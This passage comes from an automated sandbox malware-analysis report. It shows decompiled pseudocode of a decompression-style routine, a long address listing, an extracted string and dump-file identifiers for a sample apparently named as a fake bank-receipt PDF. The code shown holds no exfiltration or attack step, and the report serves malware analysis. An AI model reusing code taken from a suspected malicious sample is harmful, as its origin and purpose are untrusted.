										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push("true");
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                              0x00406bbc
                                                                                              0x00406bc0
                                                                                              0x00406bc7
                                                                                              0x00406bcd
                                                                                              0x00406bd3
                                                                                              0x00000000
                                                                                              0x00406bd7
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406bec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x00000000
                                                                                              0x00406bf9
                                                                                              0x00406bfd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c06
                                                                                              0x00406c09
                                                                                              0x00406c0c
                                                                                              0x00406c0e
                                                                                              0x00406c10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c16
                                                                                              0x00406c19
                                                                                              0x00406c1b
                                                                                              0x00406c1c
                                                                                              0x00406c1f
                                                                                              0x00406c21
                                                                                              0x00406c22
                                                                                              0x00406c24
                                                                                              0x00406c27
                                                                                              0x00406c2c
                                                                                              0x00406c31
                                                                                              0x00406c3a
                                                                                              0x00406c4d
                                                                                              0x00406c50
                                                                                              0x00406c59
                                                                                              0x00406c5c
                                                                                              0x00406c84
                                                                                              0x00406c84
                                                                                              0x00406c86
                                                                                              0x00406c94
                                                                                              0x00406c94
                                                                                              0x00406c98
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c88
                                                                                              0x00406c8b
                                                                                              0x00406c8b
                                                                                              0x00406c8c
                                                                                              0x00406c8c
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c5e
                                                                                              0x00406c62
                                                                                              0x00406c67
                                                                                              0x00406c67
                                                                                              0x00406c70
                                                                                              0x00406c76
                                                                                              0x00406c78
                                                                                              0x00406c7b
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c9e
                                                                                              0x00406c9e
                                                                                              0x00406ca2
                                                                                              0x0040754e
                                                                                              0x00000000
                                                                                              0x0040754e
                                                                                              0x00406cab
                                                                                              0x00406cbb
                                                                                              0x00406cbe
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc4
                                                                                              0x00406cc4
                                                                                              0x00406cc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406cca
                                                                                              0x00406ccd
                                                                                              0x00406cd0
                                                                                              0x00406cfa
                                                                                              0x00406d00
                                                                                              0x00406d07
                                                                                              0x00000000
                                                                                              0x00406d07
                                                                                              0x00406cd2
                                                                                              0x00406cd6
                                                                                              0x00406cd9
                                                                                              0x00406cde
                                                                                              0x00406cde
                                                                                              0x00406ce9
                                                                                              0x00406cef
                                                                                              0x00406cf1
                                                                                              0x00406cf4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d39
                                                                                              0x00406d3f
                                                                                              0x00406d42
                                                                                              0x00406d4f
                                                                                              0x00406d57
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d0e
                                                                                              0x00406d0e
                                                                                              0x00406d12
                                                                                              0x0040755d
                                                                                              0x00000000
                                                                                              0x0040755d
                                                                                              0x00406d1e
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d2c
                                                                                              0x00406d2f
                                                                                              0x00406d32
                                                                                              0x00406d35
                                                                                              0x00406d37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073dd
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x00407413
                                                                                              0x0040741a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040741c
                                                                                              0x0040741c
                                                                                              0x00407420
                                                                                              0x004075cf
                                                                                              0x00000000
                                                                                              0x004075cf
                                                                                              0x0040742c
                                                                                              0x00407433
                                                                                              0x0040743b
                                                                                              0x0040743b
                                                                                              0x0040743b
                                                                                              0x0040743e
                                                                                              0x00407441
                                                                                              0x00407441
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d5f
                                                                                              0x00406d61
                                                                                              0x00406d64
                                                                                              0x00406dd5
                                                                                              0x00406dd8
                                                                                              0x00406ddb
                                                                                              0x00406de2
                                                                                              0x00406dec
                                                                                              0x00000000
                                                                                              0x00406dec
                                                                                              0x00406d66
                                                                                              0x00406d6a
                                                                                              0x00406d6d
                                                                                              0x00406d6f
                                                                                              0x00406d72
                                                                                              0x00406d75
                                                                                              0x00406d77
                                                                                              0x00406d7a
                                                                                              0x00406d7c
                                                                                              0x00406d81
                                                                                              0x00406d84
                                                                                              0x00406d87
                                                                                              0x00406d8b
                                                                                              0x00406d92
                                                                                              0x00406d95
                                                                                              0x00406d9c
                                                                                              0x00406da0
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406dac
                                                                                              0x00406daf
                                                                                              0x00406dcd
                                                                                              0x00406dcf
                                                                                              0x00000000
                                                                                              0x00406dcf
                                                                                              0x00406db1
                                                                                              0x00406db4
                                                                                              0x00406db7
                                                                                              0x00406dba
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbf
                                                                                              0x00406dc2
                                                                                              0x00406dc4
                                                                                              0x00406dc5
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ffe
                                                                                              0x00407002
                                                                                              0x00407020
                                                                                              0x00407023
                                                                                              0x0040702a
                                                                                              0x0040702d
                                                                                              0x00407030
                                                                                              0x00407033
                                                                                              0x00407036
                                                                                              0x00407039
                                                                                              0x0040703b
                                                                                              0x00407042
                                                                                              0x00407043
                                                                                              0x00407045
                                                                                              0x00407048
                                                                                              0x0040704b
                                                                                              0x0040704e
                                                                                              0x0040704e
                                                                                              0x00407053
                                                                                              0x00000000
                                                                                              0x00407053
                                                                                              0x00407004
                                                                                              0x00407007
                                                                                              0x0040700a
                                                                                              0x00407014
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407068
                                                                                              0x0040706c
                                                                                              0x0040708f
                                                                                              0x00407092
                                                                                              0x00407095
                                                                                              0x0040709f
                                                                                              0x0040706e
                                                                                              0x0040706e
                                                                                              0x00407071
                                                                                              0x00407074
                                                                                              0x00407077
                                                                                              0x00407084
                                                                                              0x00407087
                                                                                              0x00407087
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070ab
                                                                                              0x004070af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070b5
                                                                                              0x004070b9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070bf
                                                                                              0x004070c1
                                                                                              0x004070c5
                                                                                              0x004070c5
                                                                                              0x004070c8
                                                                                              0x004070cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040711c
                                                                                              0x00407120
                                                                                              0x00407127
                                                                                              0x0040712a
                                                                                              0x0040712d
                                                                                              0x00407137
                                                                                              0x00000000
                                                                                              0x00407137
                                                                                              0x00407122
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407143
                                                                                              0x00407147
                                                                                              0x0040714e
                                                                                              0x00407151
                                                                                              0x00407154
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407157
                                                                                              0x0040715a
                                                                                              0x0040715d
                                                                                              0x0040715d
                                                                                              0x00407160
                                                                                              0x00407163
                                                                                              0x00407166
                                                                                              0x00407166
                                                                                              0x00407169
                                                                                              0x00407170
                                                                                              0x00407175
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407203
                                                                                              0x00407203
                                                                                              0x00407207
                                                                                              0x004075a5
                                                                                              0x00000000
                                                                                              0x004075a5
                                                                                              0x0040720d
                                                                                              0x00407210
                                                                                              0x00407213
                                                                                              0x00407217
                                                                                              0x0040721a
                                                                                              0x00407220
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407225
                                                                                              0x00407228
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406df8
                                                                                              0x00406df8
                                                                                              0x00406dfc
                                                                                              0x00407569
                                                                                              0x00000000
                                                                                              0x00407569
                                                                                              0x00406e02
                                                                                              0x00406e05
                                                                                              0x00406e08
                                                                                              0x00406e0c
                                                                                              0x00406e0f
                                                                                              0x00406e15
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e1a
                                                                                              0x00406e1d
                                                                                              0x00406e1d
                                                                                              0x00406e20
                                                                                              0x00406e23
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e29
                                                                                              0x00406e2f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e35
                                                                                              0x00406e35
                                                                                              0x00406e39
                                                                                              0x00406e3c
                                                                                              0x00406e3f
                                                                                              0x00406e42
                                                                                              0x00406e45
                                                                                              0x00406e46
                                                                                              0x00406e49
                                                                                              0x00406e4b
                                                                                              0x00406e51
                                                                                              0x00406e54
                                                                                              0x00406e57
                                                                                              0x00406e5a
                                                                                              0x00406e5d
                                                                                              0x00406e60
                                                                                              0x00406e63
                                                                                              0x00406e7f
                                                                                              0x00406e82
                                                                                              0x00406e85
                                                                                              0x00406e88
                                                                                              0x00406e8f
                                                                                              0x00406e93
                                                                                              0x00406e95
                                                                                              0x00406e99
                                                                                              0x00406e65
                                                                                              0x00406e65
                                                                                              0x00406e69
                                                                                              0x00406e71
                                                                                              0x00406e76
                                                                                              0x00406e78
                                                                                              0x00406e7a
                                                                                              0x00406e7a
                                                                                              0x00406e9c
                                                                                              0x00406ea3
                                                                                              0x00406ea6
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eb1
                                                                                              0x00406eb1
                                                                                              0x00406eb5
                                                                                              0x00407575
                                                                                              0x00000000
                                                                                              0x00407575
                                                                                              0x00406ebb
                                                                                              0x00406ebe
                                                                                              0x00406ec1
                                                                                              0x00406ec5
                                                                                              0x00406ec8
                                                                                              0x00406ece
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed3
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406edc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ede
                                                                                              0x00406ee1
                                                                                              0x00406ee4
                                                                                              0x00406ee7
                                                                                              0x00406eea
                                                                                              0x00406eed
                                                                                              0x00406ef0
                                                                                              0x00406ef3
                                                                                              0x00406ef6
                                                                                              0x00406ef9
                                                                                              0x00406efc
                                                                                              0x00406f14
                                                                                              0x00406f17
                                                                                              0x00406f1a
                                                                                              0x00406f1d
                                                                                              0x00406f20
                                                                                              0x00406f24
                                                                                              0x00406f26
                                                                                              0x00406efe
                                                                                              0x00406efe
                                                                                              0x00406f06
                                                                                              0x00406f0b
                                                                                              0x00406f0d
                                                                                              0x00406f0f
                                                                                              0x00406f0f
                                                                                              0x00406f29
                                                                                              0x00406f30
                                                                                              0x00406f33
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00406f33
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f75
                                                                                              0x00406f75
                                                                                              0x00406f79
                                                                                              0x00407581
                                                                                              0x00000000
                                                                                              0x00407581
                                                                                              0x00406f7f
                                                                                              0x00406f82
                                                                                              0x00406f85
                                                                                              0x00406f89
                                                                                              0x00406f8c
                                                                                              0x00406f92
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f97
                                                                                              0x00406f9a
                                                                                              0x00406f9a
                                                                                              0x00406fa0
                                                                                              0x00406f3e
                                                                                              0x00406f3e
                                                                                              0x00406f41
                                                                                              0x00000000
                                                                                              0x00406f41
                                                                                              0x00406fa2
                                                                                              0x00406fa2
                                                                                              0x00406fa5
                                                                                              0x00406fa8
                                                                                              0x00406fab
                                                                                              0x00406fae
                                                                                              0x00406fb1
                                                                                              0x00406fb4
                                                                                              0x00406fb7
                                                                                              0x00406fba
                                                                                              0x00406fbd
                                                                                              0x00406fc0
                                                                                              0x00406fd8
                                                                                              0x00406fdb
                                                                                              0x00406fde
                                                                                              0x00406fe1
                                                                                              0x00406fe4
                                                                                              0x00406fe8
                                                                                              0x00406fea
                                                                                              0x00406fc2
                                                                                              0x00406fc2
                                                                                              0x00406fca
                                                                                              0x00406fcf
                                                                                              0x00406fd1
                                                                                              0x00406fd3
                                                                                              0x00406fd3
                                                                                              0x00406fed
                                                                                              0x00406ff4
                                                                                              0x00406ff7
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407056
                                                                                              0x00407056
                                                                                              0x00407059
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073bb
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00000000
                                                                                              0x00407489
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407194
                                                                                              0x00407197
                                                                                              0x0040719a
                                                                                              0x0040719c
                                                                                              0x0040719e
                                                                                              0x0040719e
                                                                                              0x0040719f
                                                                                              0x004071a2
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040749f
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x00000000
                                                                                              0x004075db
                                                                                              0x004074a9
                                                                                              0x004074ac
                                                                                              0x004074af
                                                                                              0x004074b3
                                                                                              0x004074b6
                                                                                              0x004074bc
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c7
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x0040752b
                                                                                              0x0040752e
                                                                                              0x00407533
                                                                                              0x00407534
                                                                                              0x00407536
                                                                                              0x00407538
                                                                                              0x0040753b
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x00407447
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074eb
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x0040751d
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x004075e5
                                                                                              0x004075eb
                                                                                              0x004075ed
                                                                                              0x004075f4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000

                                                                                              Strings
                                                                                              • <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747"><path d="M1.032 1.032V15H15V1.03zm2 2H13V13H3.03z" style="line-height:normal;font-variant-ligatures:normal;font-variant-pos, xrefs: 00406BBA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747"><path d="M1.032 1.032V15H15V1.03zm2 2H13V13H3.03z" style="line-height:normal;font-variant-ligatures:normal;font-variant-pos
                                                                                              • API String ID: 0-1653615292
                                                                                              • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                              • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                                              • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
